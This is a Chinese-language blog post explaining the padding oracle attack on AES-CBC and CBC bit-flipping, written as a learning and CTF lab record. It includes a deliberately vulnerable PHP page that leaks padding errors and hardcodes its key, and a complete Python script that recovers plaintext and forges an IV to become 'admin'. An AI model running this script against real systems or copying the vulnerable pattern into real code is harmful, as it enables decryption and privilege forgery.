<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
    (function(){
	         if(''){
			             if (prompt('请输入文章密码') !== ''){
						                 alert('密码错误！');
										                 history.back();
														             }
																	         }
																			     })();
</script>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="PaddingOracleAttack," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="里面就是一些基本原理以及个人理解">
<meta name="keywords" content="PaddingOracleAttack">
<meta property="og:type" content="article">
<meta property="og:title" content="PaddingOracleAttack原理记录">
<meta property="og:url" content="http://maplege.github.io/2018/11/10/padding-oracle-attack/index.html">
<meta property="og:site_name" content="MapleGe">
<meta property="og:description" content="里面就是一些基本原理以及个人理解">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151541.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151624.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151815.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151837.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152145.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152307.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152419.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110160516.png">
<meta property="og:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110160604.png">
<meta property="og:updated_time" content="2018-11-10T08:07:11.580Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PaddingOracleAttack原理记录">
<meta name="twitter:description" content="里面就是一些基本原理以及个人理解">
<meta name="twitter:image" content="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151541.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maplege.github.io/2018/11/10/padding-oracle-attack/"/>





  <title>PaddingOracleAttack原理记录 | MapleGe</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">MapleGe</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">None</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maplege.github.io/2018/11/10/padding-oracle-attack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="暮沉沉">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://img.jsqq.net/uploads/allimg/150111/1_150111080328_19.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="MapleGe">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PaddingOracleAttack原理记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-10T15:25:04+08:00">
                2018-11-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CBC攻击/" itemprop="url" rel="index">
                    <span itemprop="name">CBC攻击</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          


          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3,248
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  13
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>里面就是一些基本原理以及个人理解<br><a id="more"></a></p>
<h1 id="Padding-Oracle-Attack"><a href="#Padding-Oracle-Attack" class="headerlink" title="Padding Oracle Attack"></a>Padding Oracle Attack</h1><p>起因是整理CTF题目时，发现了一道题，所使用的知识点是padding oracle attack，这个攻击以前就听说过，只是还没有学习过，便想借此机会学习一番。奈何readme文档写的太过简单，而其中所给出的脚本使用之后也并不能得到flag。没有办法，只能花费了两天时间从网上搜找相关资料，慢慢研究学习，完善脚本与writeup。</p>
<p>下面步入正题</p>
<h2 id="一、基础知识"><a href="#一、基础知识" class="headerlink" title="一、基础知识"></a>一、基础知识</h2><p>故名思义，Padding Oracle Attack背后的关键性概念便是加/解密时的填充(Padding)。明文信息可以是任意长度，但是块状加密算法需要所有的信息都由一定数量的数据块组成。为了满足这样的需求，便需要对明文进行填充，这样便可以将它分割为完整的数据块。</p>
<h3 id="CBC密码分组模式"><a href="#CBC密码分组模式" class="headerlink" title="CBC密码分组模式"></a>CBC密码分组模式</h3><p>我们来看一下CBC（密码分组链接）模式。在CBC模式中，每个明文块（PlainText）先与前一个密文块（CipherText）进行异或，再进行加密（使用key）。在这种方法中，每个密文块都依赖于前面的明文块。同时，为了保证每条消息的唯一性，在第一个块中需要使用初始化向量（IV）进行异或。最后将这n块密文连接起来。<br><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151541.png" alt="CBC加密"></p>
<p>CBC的解密方法则反了过来。先将密文进行解密，然后与前一个密文块进行异或（第一个用IV），得到对应分组的明文。最后再将这n块明文连接起来。<br><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151624.png" alt="CBC解密"></p>
<h3 id="填充规则"><a href="#填充规则" class="headerlink" title="填充规则"></a>填充规则</h3><p>加密时可以使用多种填充规则，但最常见的填充方式之一是在PKCS#5标准中定义的规则。</p>
<p>PCKS#5的填充方式为：明文的最后一个数据块包含N个字节的填充数据（N取决于明文最后一块的数据长度）。</p>
<p>下面是不同算法所对应的block长度<br><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151815.png" alt="block长度"></p>
<p>下图是一些示例，展示了不同长度的单词（FIG、BANANA、AVOCADO、PLANTAIN、PASSIONFRUIT）以及它们使用PKCS#5填充后的结果（在这里，我们假设每个数据块为8字节长）<br><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110151837.png" alt=""></p>
<h3 id="过程巩固"><a href="#过程巩固" class="headerlink" title="过程巩固"></a>过程巩固</h3><p>我们来巩固一遍正常情况下的加密和解密过程</p>
<p>加密：先根据所使用的加密算法判断block的大小（一般是8或16字节），根据block的大小来进行分组，最后一个block使用PKCS#5标准填充，这样得到每一块PlainText。然后使用前一块明文（第一个需使用IV）异或，异或后，再使用key和规定的加密算法进行加密，加密完成后，得到CipherText，最后将所有的CipherText连接起来，便是返回的密文了。</p>
<p>解密：根据加密算法得到block的大小，然后进行分组解密得到中间值，中间值与前一组密文（第一个使用IV）异或，异或后得到PlainText，将所有的PlainText连接起来，便是返回的明文了。</p>
<h2 id="二、Padding-Oracle-Attack攻击原理"><a href="#二、Padding-Oracle-Attack攻击原理" class="headerlink" title="二、Padding Oracle Attack攻击原理"></a>二、Padding Oracle Attack攻击原理</h2><p>Padding Oracle Attack是针对CBC链接模式的攻击，和具体的加密算法无关，换句话说，这种攻击方式不是对加密算法的攻击，而是针对算法的使用不当进行的攻击。</p>
<p>攻击者可以根据返回的密文长度来猜测block大小。例：如果返回的长度是24字节，那么block一定不会是16字节，而应该是8字节；如果知晓了加密算法，可以根据上面的对照表来得到block的大小</p>
<h3 id="攻击前提："><a href="#攻击前提：" class="headerlink" title="攻击前提："></a>攻击前提：</h3><ul>
<li>攻击者能得到IV和CipherText，并能提交CipherText</li>
<li>攻击者能够触发密文的解密过程，且服务器根据解密结果不同会返回不同的信息</li>
<li>攻击者若能提交IV，便可篡改明文。</li>
</ul>
<h3 id="服务器的处理与返回"><a href="#服务器的处理与返回" class="headerlink" title="服务器的处理与返回"></a>服务器的处理与返回</h3><p>假设我们向服务器提交了正确的密码，我们的密码在经过CBC模式加密后传给了服务器，这时服务器会对我们传来的信息尝试解密，如果可以正常解密会返回一个值表示正确，如果不能正常解密则会返回错误。而事实上，判断提交的密文能不能正常解密，第一步就是判断密文最后一组的填充值是否正确，也就是观察最后一组解密得到的结果的最后几位是否符合规范，如果错误将直接返回错误，如果正确，再将解密后的结果与服务器存储的结果比对，判断是不是正确的明文。也就是说服务器一共可能有三种判断结果：</p>
<ul>
<li>密文不能正常解密（填充错误）；</li>
<li>密文可以正常解密但解密结果不对（填充正确，但得到的明文错误）；</li>
<li>密文可以正常解密并且解密结果比对正确（填充正确，明文正确）；</li>
</ul>
<p>其中第一种情况与第二三种情况的返回值一定不一样，这就给了我们可乘之机——我们可以利用服务器的返回值判断我们提交的内容能不能正常解密，即判断我们提交的最后一组密文的填充是否符合规范。下面给出了正确与错误的图示</p>
<p><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152145.png" alt="正确"></p>
<p><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152307.png" alt="错误"></p>
<p>再看一次CBC的解密过程：将CipherText使用key和解密算法解密得到中间值，将中间值与前一组密文（或IV）进行异或得到PlainText。而攻击的前提就是服务器提供CipherText和IV，所以只要我们知道了中间值，便可知道PlainText。这就是Padding Oracle Attack的核心——找出正确的中间值</p>
<h3 id="如何才能找出正确的中间值"><a href="#如何才能找出正确的中间值" class="headerlink" title="如何才能找出正确的中间值"></a>如何才能找出正确的中间值</h3><p>前面我们说过服务器会根据我们提交的CipherText的解密结果返回不同的三种情况，我们就依据这三种情况（实际上是两种，填充正确和填充不正确）来得到中间值。</p>
<p>我们还是来看上图的例子，假设只有一个block，中间值是不变的，如果我们将IV修改为全0，返回的明文则与中间值完全一样，但这样基本不可能填充正确。我们需要的是最后一位填充0x01，那么经过遍历最后一个字节后发现当最后一字节为0x3C时，页面返回填充正确的结果，即 中间值^0x3C=0x01，中间值=0x01^0x3C=0x3D。</p>
<p><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110152419.png" alt=""></p>
<p>经过上面的步骤便能得到最后一个字节的中间值。得到之后，需要得到倒数第二个字节的中间值，此时将IV的最后一字节变为0x3D^0x02=0x3F，IV的倒数第二个字节进行遍历，发现当倒数第二个字节为0x24时，页面返回填充正确的结果，即 中间值=0x02^0x24=0x26……以此类推，得到完整的中间值。最后将中间值与IV异或，便可得到明文。</p>
<p>上面说的是最简单的情况：只有一个block。当有多个block时，我们从最后一个block入手（因为该算法要先经过key解密得到中间值，而中间值在同一个CipherText下是一定不变的，后面的PlainText受前一个CipherText影响，而前面的PlainText与后面无关，所以需要从后往前走）。单独截取最后一个block，前面一个block填充全0并遍历得到中间值（若有长度限制，必须与正常密文长度相同，则只将到倒数第二个block修改即可）；得到最后一个block的中间值后，将最后一个block舍弃，截取倒数第二个block，前面一个block填充全0并遍历得到中间值（若有长度限制，将倒数第二个block与最后一个block互换位置，互换后的倒数第二个block填充全0并遍历得到中间值）；以此类推，得到所有中间值</p>
<p>我们得到中间值之后，便可得到明文。如果我们还可以控制IV，那么将IV与原明文异或后，再与想得到的明文异或得到新的IV，然后将新的IV提交，便可得到想要的明文。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">原理：</div><div class="line"></div><div class="line">异或是相同为0，不同为1；0与x异或得到x；</div><div class="line">IV^中间值=PlainText</div><div class="line">IV^中间值^PlainText^PlainTextNew=PlainText^PlainText^PlainTextNew=PlainTextNew</div><div class="line">其中中间值不变，将IV^PlainText^PlainTextNew后提交即可。</div><div class="line">这其实就是CBC字节翻转攻击了，具体的原理可以参考其他文章</div></pre></td></tr></table></figure>
<h2 id="三、实例"><a href="#三、实例" class="headerlink" title="三、实例"></a>三、实例</h2><p>为了更好的理解和利用Padding Oracle Attack，我自己编写了一个简单的PHP页面。</p>
<h3 id="主要功能："><a href="#主要功能：" class="headerlink" title="主要功能："></a>主要功能：</h3><p>页面显示加密算法、IV、CipherText，并提供两个提交表单；第一个表单根据提交的cipher返回解密成功或失败；第二个表单要求提交正确的PlainText，然后通过修改iv让PlainText的值变为admin。</p>
<p>流程是先判断提交的plainText是否正确，然后将提交的iv和cipher进行解密，如果解密后得到admin则返回PlainText Changed Success!</p>
<h3 id="页面代码"><a href="#页面代码" class="headerlink" title="页面代码"></a>页面代码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">define(&quot;SECRET_KEY&quot;, &quot;thkeyw&quot;);  # 加密密钥</div><div class="line">define(&quot;METHOD&quot;, &quot;aes-128-cbc&quot;);  # 加密算法</div><div class="line">echo &quot;method:&quot;,METHOD.&quot;&lt;br&gt;&quot;;</div><div class="line">function get_random_token()&#123;   # 生成随机数</div><div class="line">    $random_token=&apos;&apos;;</div><div class="line">    for($i=0;$i&lt;16;$i++)&#123;</div><div class="line">        $random_token.=chr(rand(1,255));</div><div class="line">    &#125;</div><div class="line">    return $random_token;</div><div class="line">&#125;</div><div class="line">$iv=get_random_token();</div><div class="line">$plainText=&quot;user&quot;;</div><div class="line">$cipher=openssl_encrypt($plainText,METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$iv);</div><div class="line">echo &quot;iv:&quot;,base64_encode($iv).&quot;&lt;br&gt;&quot;;</div><div class="line">echo &quot;cipher:&quot;,base64_encode($cipher).&quot;&lt;br&gt;&quot;;</div><div class="line">?&gt;</div><div class="line">&lt;div&gt;</div><div class="line">    &lt;p&gt;Try to use Padding Oracle Attack to get plainText first. Put the IV in front of the cipher&lt;/p&gt;</div><div class="line">    &lt;form action=&quot;&quot; method=&quot;POST&quot;&gt;</div><div class="line">        &lt;p&gt;cipher:&lt;input type=&quot;text&quot; name=&quot;cipher&quot;&gt;&lt;/p&gt;</div><div class="line">        &lt;p&gt;&lt;input type=&quot;submit&quot;&gt;&lt;/p&gt;</div><div class="line">    &lt;/form&gt;</div><div class="line">&lt;/div&gt;</div><div class="line">&lt;div&gt;</div><div class="line">    &lt;p&gt;Second,give me PlainText and new iv,to make new PlainText to be admin&lt;/p&gt;</div><div class="line">    &lt;form action=&quot;&quot; method=&quot;POST&quot;&gt;</div><div class="line">        &lt;p&gt;iv:&lt;input type=&quot;text&quot; name=&quot;iv&quot;&gt;&lt;/p&gt;</div><div class="line">        &lt;p&gt;cipher:&lt;input type=&quot;text&quot; name=&quot;cipher&quot;&gt;&lt;/p&gt;</div><div class="line">        &lt;p&gt;plain:&lt;input type=&quot;text&quot; name=&quot;plain&quot;&gt;&lt;/p&gt;</div><div class="line">        &lt;p&gt;&lt;input type=&quot;submit&quot;&gt;&lt;/p&gt;</div><div class="line">    &lt;/form&gt;</div><div class="line">&lt;/div&gt;</div><div class="line"></div><div class="line">&lt;?php</div><div class="line">if(isset($_POST[&apos;iv&apos;])&amp;&amp;isset($_POST[&apos;plain&apos;])&amp;&amp;isset($_POST[&apos;cipher&apos;]))&#123; # 第二个提交表单，测试CBC字节翻转攻击</div><div class="line">    if($_POST[&apos;plain&apos;]===$plainText)&#123;</div><div class="line">        $iv_new=base64_decode($_POST[&apos;iv&apos;]);</div><div class="line">        $plainText_new=openssl_decrypt(base64_decode($_POST[&apos;cipher&apos;]),METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$iv_new);</div><div class="line">        if($plainText_new===&apos;admin&apos;)&#123;</div><div class="line">            echo &quot;PlainText Changed Success!&quot;;</div><div class="line">        &#125;else&#123;</div><div class="line">            die(&apos;Let plainText be admin, please!&apos;);</div><div class="line">        &#125;</div><div class="line">    &#125;else&#123;</div><div class="line">        die(&apos;plainText error&apos;);</div><div class="line">    &#125;</div><div class="line">&#125;elseif(isset($_POST[&apos;cipher&apos;]))&#123; # 第一个提交表单，测试Padding Oracle Attack</div><div class="line">    $cipher_post=base64_decode($_POST[&apos;cipher&apos;]);</div><div class="line">    $ivv=substr($cipher_post,0,16);</div><div class="line">    $cipherr=substr($cipher_post,16);</div><div class="line">    $p=openssl_decrypt($cipherr,METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$ivv);</div><div class="line">    if($p!=&quot;&quot;)&#123;</div><div class="line">        echo &quot;crypt success!&lt;br&gt;&quot;;</div><div class="line">    &#125;else&#123;</div><div class="line">        echo &quot;crypt failed!&lt;br&gt;&quot;;</div><div class="line">    &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>页面显示效果</p>
<p><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110160516.png" alt=""></p>
<p>使用的加密模式是aes-128-cbc，而aes的block大小是16字节，这一点与上面原理部分不同，需要稍稍注意一下。</p>
<h3 id="攻击脚本"><a href="#攻击脚本" class="headerlink" title="攻击脚本"></a>攻击脚本</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div></pre></td><td class="code"><pre><div class="line">#-*- coding:utf-8 -*-</div><div class="line">import requests,urllib,base64,re</div><div class="line">url=&apos;http://192.168.12.199/test.php&apos;</div><div class="line">s=requests.session()</div><div class="line"># 用来进行发包，返回页面结果</div><div class="line">def inject(var):</div><div class="line">    data=&#123;&apos;cipher&apos;:var&#125;</div><div class="line">    # 必须要用requests，不能用s，因为如果在这里用s，后面循环中会使用，最后会存储一个在break时的值</div><div class="line">    # 而这个值是错误的，所以这里不能用requests.session。在这里坑了好久</div><div class="line">    result=requests.post(url,data=data)</div><div class="line">    return result</div><div class="line"># 字符串异或函数</div><div class="line">def xor(a,b):</div><div class="line">    ss=&quot;&quot;</div><div class="line">    for i in xrange(len(a)):</div><div class="line">        ss+=chr(ord(a[i])^ord(b[i]))</div><div class="line">    return ss</div><div class="line"># 使用正则匹配得到页面给出的iv和cipher</div><div class="line">repo=s.get(url)</div><div class="line">iv=re.compile(&quot;iv:(.*?)&lt;br&gt;&quot;).findall(repo.content)[0]</div><div class="line">cipher=re.compile(&quot;cipher:(.*?)&lt;br&gt;&quot;).findall(repo.content)[0]</div><div class="line">middle=&quot;&quot; # 中间值</div><div class="line"># 因16个字节为一组，字符最大到0xff，所以有如下循环</div><div class="line"># 在进行大批量运算时，xrange比range性能要好</div><div class="line">for i in xrange(1,17):</div><div class="line">    for j in xrange(0,256):</div><div class="line">        # 根据已经得到的中间值计算下次测试时对应位置的填充值</div><div class="line">        # 比如已经得到最后一位的中间值，那么计算倒数第二位中间值时，要根据最后一位中间值计算此时最后一位对应的填充值，让明文为0x02</div><div class="line">        padding=xor(middle,chr(i)*(i-1))</div><div class="line">        # 前面是0，跟着一字节测试值，跟着已得到中间值所对应的填充值，最后是正常的密文</div><div class="line">        ever_c=chr(0)*(16-i)+chr(j)+padding+base64.b64decode(cipher)</div><div class="line">        # 判断当前payload是否正常，有可能出现特殊情况</div><div class="line">        # 比如中间值的倒数第二位本来就是0x02，中间值的倒数第二位计算的结果会先得到0x02，再得到0x01，这种情况下会出错</div><div class="line">        if len(ever_c)&lt;32:</div><div class="line">            exit(&quot;wrong, please retry&quot;)</div><div class="line">        print ever_c.encode(&apos;hex&apos;)</div><div class="line">        ever_result=inject(base64.b64encode(chr(0)*16+ever_c))</div><div class="line">        # 判断解密是否正常，正常则得到该位中间值</div><div class="line">        if &quot;crypt failed&quot; not in ever_result.content:</div><div class="line">            middle=chr(j^i)+middle</div><div class="line">            break</div><div class="line">plain=xor(middle,base64.b64decode(iv))   # 明文（包括填充）</div><div class="line">print &quot;middle:&quot;,middle.encode(&apos;hex&apos;)   # 中间值，十六进制方便显示</div><div class="line">print &quot;plain:&quot;,plain</div><div class="line">print &quot;iv:&quot;,iv</div><div class="line">print &quot;cipher:&quot;,cipher</div><div class="line">plainText_new=&apos;admin&apos;+chr(11)*11  # 想要得到的明文</div><div class="line">iv_new=xor(base64.b64decode(iv),xor(plain,plainText_new))   # 新的iv，提交后便可得到admin</div><div class="line">print &quot;iv_new:&quot;,base64.b64encode(iv_new)</div><div class="line">data=&#123;&apos;plain&apos;:&apos;user&apos;,&apos;iv&apos;:base64.b64encode(iv_new),&apos;cipher&apos;:cipher&#125;</div><div class="line">print requests.post(url,data=data).content</div></pre></td></tr></table></figure>
<p>脚本运行结果：</p>
<p><img src="https://maplege-1257289410.cos.ap-beijing.myqcloud.com/imgs/20181110160604.png" alt=""></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html" target="_blank" rel="external">http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html</a><br><a href="https://www.freebuf.com/articles/web/15504.html" target="_blank" rel="external">https://www.freebuf.com/articles/web/15504.html</a><br><a href="https://www.freebuf.com/articles/database/151167.html" target="_blank" rel="external">https://www.freebuf.com/articles/database/151167.html</a><br><a href="https://www.csdn.net/article/1970-01-01/289154" target="_blank" rel="external">https://www.csdn.net/article/1970-01-01/289154</a></p>

      
    </div>
    
    
    

	
	  <div>
	     
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
    
    <!-- JS库 sweetalert 可修改路径 -->
	  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
	    <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
		  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
		    <p><span>本文标题:</span><a href="/2018/11/10/padding-oracle-attack/">PaddingOracleAttack原理记录</a></p>
			  <p><span>文章作者:</span><a href="/" title="访问 暮沉沉 的个人博客">暮沉沉</a></p>
			    <p><span>发布时间:</span>2018年11月10日 - 15:11</p>
				  <p><span>最后更新:</span>2018年11月10日 - 16:11</p>
				    <p><span>原始链接:</span><a href="/2018/11/10/padding-oracle-attack/" title="PaddingOracleAttack原理记录">http://maplege.github.io/2018/11/10/padding-oracle-attack/</a>
					    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://maplege.github.io/2018/11/10/padding-oracle-attack/"  aria-label="复制成功！"></i></span>
						  </p>
						    <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
							</div>
							<script> 
							    var clipboard = new Clipboard('.fa-clipboard');
								    clipboard.on('success', $(function(){
												      $(".fa-clipboard").click(function(){
															          swal({   
																			            title: "",   
																						          text: '复制成功',   
																								            html: false,
																											          timer: 500,   
																													            showConfirmButton: false
																																        });
																	        });
													      }));  
</script>


	  </div>
	


    

	
	  <div>
	    
<div>
    
	        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
			    
				</div>

	  </div>
	
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PaddingOracleAttack/" rel="tag"><i class="fa fa-tag"></i> PaddingOracleAttack</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/10/linux-mount-windows-share/" rel="next" title="Linux挂载Windows共享">
                <i class="fa fa-chevron-left"></i> Linux挂载Windows共享
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
